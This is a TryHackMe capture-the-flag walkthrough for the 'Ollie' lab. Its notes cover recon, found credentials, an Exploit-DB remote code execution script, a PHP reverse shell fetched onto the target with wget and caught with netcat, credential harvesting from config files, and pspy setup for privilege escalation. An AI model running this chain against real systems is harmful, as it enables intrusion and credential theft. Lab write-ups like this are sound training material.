Ollie

Room Link: https://tryhackme.com/room/ollie

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/1337 - waste

Kali

nc -v $VICTIM 1337

TCP/80 - HTTP

Browser

Username: admin
Password: OllieUnixMontgomery!

Initial Shell

Exploit: https://www.exploit-db.com/raw/50963

Kali

python3 exploit.py  -usr admin -pwd OllieUnixMontgomery! -cmd 'whoami' -url http://$VICTIM

We can run commands from the browser as well.

Got this php reverse shell, just changed the IP

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell
cd php-reverse-shell
subl php-reverse-shell.php 
python2 -m SimpleHTTPServer 81

Kali

nc -lvnp 1234

We have access to write to the immaolllieeboyyy directory so we put our shell there.

Browser

wget http://$KALI:81/php-reverse-shell.php -O immaolllieeboyyy/test.php

Browser

http://VICTIM:/immaolllieeboyyy/test.php

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

cd /var/www/html
grep -ir "pass" config.php -A4 -B4

We can login to mysql but didn't find anything

Victim

mysql -uphpipam_ollie -pIamDah1337estHackerDog!

Victim

su ollie
Password: OllieUnixMontgomery!

PSPY

Kali

wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32 

Victim

cd /tmp/
wget http://10.10.231.159:81/pspy32 
chmod +x pspy32 
./pspy32
find / -name "feedme" 2>/dev/null 

Privilege Escalation

Kali

nc -lvnp 1338

Last updated